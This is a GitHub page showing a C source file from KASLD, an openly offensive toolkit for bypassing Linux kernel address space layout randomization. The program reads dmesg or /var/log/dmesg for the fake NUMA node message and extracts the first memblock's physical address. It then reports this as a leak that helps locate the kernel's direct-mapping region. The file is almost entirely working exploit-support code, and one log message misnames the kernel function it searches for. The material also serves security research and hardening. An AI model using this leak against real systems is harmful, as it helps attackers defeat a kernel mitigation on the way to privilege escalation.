-
Notifications
You must be signed in to change notification settings - Fork 47
/
dmesg_fake_numa_init.c
129 lines (105 loc) · 3.19 KB
/
dmesg_fake_numa_init.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
// This file is part of KASLD - https://github.com/bcoles/kasld
//
// fake_numa_init() / dummy_numa_init() prints memblock_start_of_DRAM()
// physical address of the first memblock to dmesg on systems which do not
// support Non-Uniform Memory Access (NUMA).
//
// On systems with a known phys->virt offset mapping, this may be used to
// identify the kernel virtual address region used for direct mapping.
//
// NUMA support may be disabled in BIOS or via Linux kernel command line with
// the `acpi=off` flag. Systems without Advanced Configuration and Power
// Interface (ACPI) do not support NUMA.
//
// Requires:
// - kernel.dmesg_restrict = 0; or CAP_SYSLOG capabilities; or
// readable /var/log/dmesg.
//
// References:
// https://cateee.net/lkddb/web-lkddb/NUMA.html
// https://elixir.bootlin.com/linux/v6.2-rc3/source/drivers/base/arch_numa.c#L429
// https://elixir.bootlin.com/linux/v6.2-rc3/source/arch/x86/mm/numa.c#L709
// https://elixir.bootlin.com/linux/v6.2-rc3/source/arch/loongarch/kernel/numa.c#L401
// https://elixir.bootlin.com/linux/v6.2-rc3/source/mm/memblock.c#L1663
// ---
// <[email protected]>
#define _GNU_SOURCE
#include "include/kasld.h"
#include "include/syslog.h"
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
unsigned long get_phys_addr_dmesg_fake_numa_init() {
char *syslog;
char *endptr;
char *substr;
char *line_buf;
char *addr_buf;
const char *needle = "NUMA: Faking a node at";
int size;
unsigned long addr = 0;
printf("[.] searching dmesg for fake_numa_init() info ...\n");
if (mmap_syslog(&syslog, &size))
return 0;
substr = strstr(syslog, needle);
if (substr == NULL)
return 0;
line_buf = strtok(substr, "\n");
if (line_buf == NULL)
return 0;
/* NUMA: Faking a node at [mem 0x0000000080200000-0x00000000bfffffff] */
// printf("%s\n", line_buf);
addr_buf = strstr(line_buf, " [mem ");
if (addr_buf == NULL)
return 0;
addr = strtoul(&addr_buf[5], &endptr, 16);
if (addr)
return addr;
return 0;
}
unsigned long get_phys_addr_dmesg_log_file_fake_numa_init() {
FILE *f;
char *endptr;
char *substr;
char *addr_buf;
char *line_buf;
const char *path = "/var/log/dmesg";
const char *needle = "NUMA: Faking a node at";
unsigned long addr = 0;
char buff[BUFSIZ];
printf("[.] searching %s for free_area_init_node() info ...\n", path);
f = fopen(path, "rb");
if (f == NULL) {
perror("[-] fopen");
return 0;
}
while ((fgets(buff, BUFSIZ, f)) != NULL) {
substr = strstr(buff, needle);
if (substr == NULL)
continue;
line_buf = strtok(substr, "\n");
if (line_buf == NULL)
break;
/* NUMA: Faking a node at [mem 0x0000000080200000-0x00000000bfffffff] */
// printf("%s\n", line_buf);
addr_buf = strstr(line_buf, " [mem ");
if (addr_buf == NULL)
break;
addr = strtoul(&addr_buf[5], &endptr, 16);
if (addr)
break;
}
fclose(f);
return addr;
}
int main() {
unsigned long addr = get_phys_addr_dmesg_fake_numa_init();
if (!addr)
addr = get_phys_addr_dmesg_log_file_fake_numa_init();
if (!addr)
return 1;
printf("leaked faked NUMA NODE #0 physical address: %#018lx\n", addr);
return 0;
}